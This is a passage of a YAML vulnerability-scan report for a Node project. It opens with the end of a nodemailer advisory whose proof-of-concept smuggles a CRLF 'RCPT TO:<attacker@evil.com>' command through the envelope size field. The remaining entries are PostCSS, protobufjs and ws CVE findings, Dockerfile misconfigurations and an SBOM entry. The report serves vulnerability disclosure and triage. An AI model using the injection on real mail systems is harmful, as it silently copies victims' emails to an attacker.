\ buffer += chunk.toString();\n const lines = buffer.split('\\\
|
|
r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\
|
|
\ if (!line) continue;\n console.log('C:', line);\n \
|
|
\ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\
|
|
r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\
|
|
\ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\
|
|
\ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\\
|
|
r\\n');\n } else if (line === 'DATA') {\n socket.write('354\
|
|
\ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\
|
|
\ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \
|
|
\ socket.write('221 Bye\\r\\n');\n socket.end();\n \
|
|
\ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n\
|
|
\ const port = server.address().port;\n console.log('SMTP server on port',\
|
|
\ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n\
|
|
\ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\
|
|
\ port,\n secure: false,\n tls: { rejectUnauthorized: false\
|
|
\ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\
|
|
\ to: 'recipient@example.com',\n subject: 'Normal email',\n \
|
|
\ text: 'This is a normal email.',\n envelope: {\n from:\
|
|
\ 'sender@example.com',\n to: ['recipient@example.com'],\n \
|
|
\ size: '100\\r\\nRCPT TO:<attacker@evil.com>',\n },\n }, (err)\
|
|
\ => {\n if (err) console.error('Error:', err.message);\n console.log('\\\
|
|
nExpected output above:');\n console.log(' C: MAIL FROM:<sender@example.com>\
|
|
\ SIZE=100');\n console.log(' C: RCPT TO:<attacker@evil.com> \
|
|
\ <-- INJECTED');\n console.log(' C: RCPT TO:<recipient@example.com>');\n\
|
|
\ server.close();\n transporter.close();\n });\n});\n```\n\n\
|
|
**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\
|
|
\ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:<sender@example.com> SIZE=100\n\
|
|
C: RCPT TO:<attacker@evil.com>\nC: RCPT TO:<recipient@example.com>\nC: DATA\n\
|
|
...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:<attacker@evil.com>` line is injected\
|
|
\ by the CRLF in the `size` field, silently adding an extra recipient to the\
|
|
\ email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An\
|
|
\ attacker who can influence the `envelope.size` property in a `sendMail()`\
|
|
\ call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected\
|
|
\ `RCPT TO` commands, receiving copies of all emails sent through the affected\
|
|
\ transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional\
|
|
\ `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage\
|
|
\ the sending organization's SMTP server reputation** for spam or phishing delivery\n\
|
|
\nThe severity is mitigated by the fact that the `envelope` object must be explicitly\
|
|
\ provided by the application. Nodemailer's default envelope construction from\
|
|
\ message headers does not include `size`. Applications that pass through user-controlled\
|
|
\ data to the envelope options (e.g., via API parameters, admin panels, or template\
|
|
\ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\
|
|
\ likely all versions where `envelope.size` is supported."
|
|
Severity: LOW
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
|
|
V40Score: 2.3
|
|
References:
|
|
- https://github.com/nodemailer/nodemailer
|
|
- https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651
|
|
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8
|
|
PublishedDate: '2026-03-26T22:26:46Z'
|
|
LastModifiedDate: '2026-03-26T22:26:46Z'
|
|
context:
|
|
sbom:
|
|
name: nodemailer
|
|
version: 6.10.1
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.666666666666666
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a6ff7b0fa39fdb3f
|
|
ruleId: CVE-2026-41305
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of
|
|
style closing tags'
|
|
title: CVE-2026-41305
|
|
description: PostCSS takes a CSS file and provides an API to analyze and modify
|
|
its rules by transforming the rules into an Abstract Syntax Tree. Versions prior
|
|
to 8.5.10 do not escape `</style>` sequences when stringifying CSS ASTs. When
|
|
user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>`
|
|
tags, `</style>` in CSS values breaks out of the style context, enabling XSS.
|
|
Version 8.5.10 fixes the issue.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-41305
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:postcss@8.4.31
|
|
risk:
|
|
cwe: &id050
|
|
- CWE-79
|
|
raw:
|
|
VulnerabilityID: CVE-2026-41305
|
|
VendorIDs:
|
|
- GHSA-qx2v-qp2m-jg93
|
|
PkgID: postcss@8.4.31
|
|
PkgName: postcss
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/postcss@8.4.31
|
|
UID: d845910d063cee9a
|
|
InstalledVersion: 8.4.31
|
|
FixedVersion: 8.5.10
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-41305
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6
|
|
Title: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of
|
|
style closing tags'
|
|
Description: PostCSS takes a CSS file and provides an API to analyze and modify
|
|
its rules by transforming the rules into an Abstract Syntax Tree. Versions prior
|
|
to 8.5.10 do not escape `</style>` sequences when stringifying CSS ASTs. When
|
|
user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>`
|
|
tags, `</style>` in CSS values breaks out of the style context, enabling XSS.
|
|
Version 8.5.10 fixes the issue.
|
|
Severity: MEDIUM
|
|
CweIDs: *id050
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-41305
|
|
- https://github.com/postcss/postcss
|
|
- https://github.com/postcss/postcss/releases/tag/8.5.10
|
|
- https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-41305
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-41305
|
|
PublishedDate: '2026-04-24T03:16:11.547Z'
|
|
LastModifiedDate: '2026-04-24T17:16:21.5Z'
|
|
context:
|
|
sbom:
|
|
name: postcss
|
|
version: 8.4.31
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cweTop25_2024:
|
|
- id: CWE-79
|
|
rank: 1
|
|
category: Injection
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id041
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id042
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id043
|
|
- *id015
|
|
priority:
|
|
priority: 13.349866666666665
|
|
epss: 0.00031
|
|
epss_percentile: 0.09168
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00124
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 62517a0411bc2994
|
|
ruleId: CVE-2026-45740
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor
|
|
expansion'
|
|
title: CVE-2026-45740
|
|
description: protobufjs compiles protobuf definitions into JavaScript (JS) functions.
|
|
Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while
|
|
expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON().
|
|
A crafted JSON descriptor with deeply nested namespace definitions could cause
|
|
the JavaScript call stack to be exhausted during descriptor loading. This vulnerability
|
|
is fixed in 7.5.8 and 8.2.0.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-45740
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:protobufjs@7.5.6
|
|
risk:
|
|
cwe: &id051
|
|
- CWE-674
|
|
raw:
|
|
VulnerabilityID: CVE-2026-45740
|
|
VendorIDs:
|
|
- GHSA-jggg-4jg4-v7c6
|
|
PkgID: protobufjs@7.5.6
|
|
PkgName: protobufjs
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/protobufjs@7.5.6
|
|
UID: 11481e02f6a2a6cd
|
|
InstalledVersion: 7.5.6
|
|
FixedVersion: 7.5.8, 8.2.0
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45740
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89
|
|
Title: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor
|
|
expansion'
|
|
Description: protobufjs compiles protobuf definitions into JavaScript (JS) functions.
|
|
Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while
|
|
expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON().
|
|
A crafted JSON descriptor with deeply nested namespace definitions could cause
|
|
the JavaScript call stack to be exhausted during descriptor loading. This vulnerability
|
|
is fixed in 7.5.8 and 8.2.0.
|
|
Severity: MEDIUM
|
|
CweIDs: *id051
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/protobufjs/protobuf.js
|
|
- https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-45740
|
|
PublishedDate: '2026-05-13T16:17:00.52Z'
|
|
LastModifiedDate: '2026-05-13T20:50:15.587Z'
|
|
context:
|
|
sbom:
|
|
name: protobufjs
|
|
version: 7.5.6
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.36426666666667
|
|
epss: 0.00058
|
|
epss_percentile: 0.1822
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00232
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4aee8c6d135a7c0c
|
|
ruleId: CVE-2026-45736
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: ws is an open source WebSocket client and server for Node.js. Prior to
|
|
...
|
|
title: CVE-2026-45736
|
|
description: ws is an open source WebSocket client and server for Node.js. Prior
|
|
to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized
|
|
memory disclosure when a TypedArray is passed as the reason argument. This vulnerability
|
|
is fixed in 8.20.1.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-45736
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:ws@8.18.3
|
|
risk:
|
|
cwe: &id052
|
|
- CWE-908
|
|
raw:
|
|
VulnerabilityID: CVE-2026-45736
|
|
VendorIDs:
|
|
- GHSA-58qx-3vcg-4xpx
|
|
PkgID: ws@8.18.3
|
|
PkgName: ws
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/ws@8.18.3
|
|
UID: f8dc386179443300
|
|
InstalledVersion: 8.18.3
|
|
FixedVersion: 8.20.1
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45736
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98
|
|
Title: ws is an open source WebSocket client and server for Node.js. Prior to
|
|
...
|
|
Description: ws is an open source WebSocket client and server for Node.js. Prior
|
|
to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized
|
|
memory disclosure when a TypedArray is passed as the reason argument. This vulnerability
|
|
is fixed in 8.20.1.
|
|
Severity: MEDIUM
|
|
CweIDs: *id052
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 4.4
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/websockets/ws
|
|
- https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086
|
|
- https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-45736
|
|
PublishedDate: '2026-05-15T15:16:54.103Z'
|
|
LastModifiedDate: '2026-05-19T14:39:20.353Z'
|
|
context:
|
|
sbom:
|
|
name: ws
|
|
version: 8.18.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.338133333333333
|
|
epss: 9.0e-05
|
|
epss_percentile: 0.00961
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00036
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eba667be954e5b93
|
|
ruleId: Image user should not be 'root'
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.dev
|
|
startLine: 0
|
|
message: Image user should not be 'root'
|
|
title: Image user should not be 'root'
|
|
description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which can
|
|
be done by adding a 'USER' statement to the Dockerfile.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0002
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0002
|
|
Title: Image user should not be 'root'
|
|
Description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which
|
|
can be done by adding a 'USER' statement to the Dockerfile.
|
|
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
|
|
Namespace: builtin.dockerfile.DS002
|
|
Query: data.builtin.dockerfile.DS002.deny
|
|
Resolution: Add 'USER <non root user name>' line to the Dockerfile
|
|
Severity: HIGH
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
|
|
References:
|
|
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
|
|
- https://avd.aquasec.com/misconfig/ds-0002
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 63eaab178df076b0
|
|
ruleId: No HEALTHCHECK defined
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.dev
|
|
startLine: 0
|
|
message: No HEALTHCHECK defined
|
|
title: No HEALTHCHECK defined
|
|
description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0026
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0026
|
|
Title: No HEALTHCHECK defined
|
|
Description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
Message: Add HEALTHCHECK instruction in your Dockerfile
|
|
Namespace: builtin.dockerfile.DS026
|
|
Query: data.builtin.dockerfile.DS026.deny
|
|
Resolution: Add HEALTHCHECK instruction in Dockerfile
|
|
Severity: LOW
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
|
|
References:
|
|
- https://blog.aquasec.com/docker-security-best-practices
|
|
- https://avd.aquasec.com/misconfig/ds-0026
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.666666666666666
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e68d0bbfcfdade0c
|
|
ruleId: Image user should not be 'root'
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.production
|
|
startLine: 0
|
|
message: Image user should not be 'root'
|
|
title: Image user should not be 'root'
|
|
description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which can
|
|
be done by adding a 'USER' statement to the Dockerfile.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0002
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0002
|
|
Title: Image user should not be 'root'
|
|
Description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which
|
|
can be done by adding a 'USER' statement to the Dockerfile.
|
|
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
|
|
Namespace: builtin.dockerfile.DS002
|
|
Query: data.builtin.dockerfile.DS002.deny
|
|
Resolution: Add 'USER <non root user name>' line to the Dockerfile
|
|
Severity: HIGH
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
|
|
References:
|
|
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
|
|
- https://avd.aquasec.com/misconfig/ds-0002
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7b29c0ae384e49f6
|
|
ruleId: No HEALTHCHECK defined
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.production
|
|
startLine: 0
|
|
message: No HEALTHCHECK defined
|
|
title: No HEALTHCHECK defined
|
|
description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0026
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0026
|
|
Title: No HEALTHCHECK defined
|
|
Description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
Message: Add HEALTHCHECK instruction in your Dockerfile
|
|
Namespace: builtin.dockerfile.DS026
|
|
Query: data.builtin.dockerfile.DS026.deny
|
|
Resolution: Add HEALTHCHECK instruction in Dockerfile
|
|
Severity: LOW
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
|
|
References:
|
|
- https://blog.aquasec.com/docker-security-best-practices
|
|
- https://avd.aquasec.com/misconfig/ds-0026
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.666666666666666
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c5cf815654ece26c
|
|
ruleId: Image user should not be 'root'
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.test
|
|
startLine: 0
|
|
message: Image user should not be 'root'
|
|
title: Image user should not be 'root'
|
|
description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which can
|
|
be done by adding a 'USER' statement to the Dockerfile.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0002
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0002
|
|
Title: Image user should not be 'root'
|
|
Description: Running containers with 'root' user can lead to a container escape
|
|
situation. It is a best practice to run containers as non-root users, which
|
|
can be done by adding a 'USER' statement to the Dockerfile.
|
|
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
|
|
Namespace: builtin.dockerfile.DS002
|
|
Query: data.builtin.dockerfile.DS002.deny
|
|
Resolution: Add 'USER <non root user name>' line to the Dockerfile
|
|
Severity: HIGH
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
|
|
References:
|
|
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
|
|
- https://avd.aquasec.com/misconfig/ds-0002
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 09a592ef82d0362e
|
|
ruleId: No HEALTHCHECK defined
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: Dockerfile.test
|
|
startLine: 0
|
|
message: No HEALTHCHECK defined
|
|
title: No HEALTHCHECK defined
|
|
description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
remediation: https://avd.aquasec.com/misconfig/ds-0026
|
|
references: []
|
|
tags:
|
|
- misconfig
|
|
raw:
|
|
Type: Dockerfile Security Check
|
|
ID: DS-0026
|
|
Title: No HEALTHCHECK defined
|
|
Description: You should add HEALTHCHECK instruction in your docker container images
|
|
to perform the health check on running containers.
|
|
Message: Add HEALTHCHECK instruction in your Dockerfile
|
|
Namespace: builtin.dockerfile.DS026
|
|
Query: data.builtin.dockerfile.DS026.deny
|
|
Resolution: Add HEALTHCHECK instruction in Dockerfile
|
|
Severity: LOW
|
|
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
|
|
References:
|
|
- https://blog.aquasec.com/docker-security-best-practices
|
|
- https://avd.aquasec.com/misconfig/ds-0026
|
|
Status: FAIL
|
|
CauseMetadata:
|
|
Provider: Dockerfile
|
|
Service: general
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.666666666666666
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 18edd79c677235d0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @alloc/quick-lru 5.2.0'
|
|
title: '@alloc/quick-lru 5.2.0'
|
|
description: 'Package discovered: @alloc/quick-lru 5.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 47af215a45bf2740
|
|
name: '@alloc/quick-lru'
|
|
version: 5.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40alloc/quick-lru@5.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz
|
|
integrity: sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
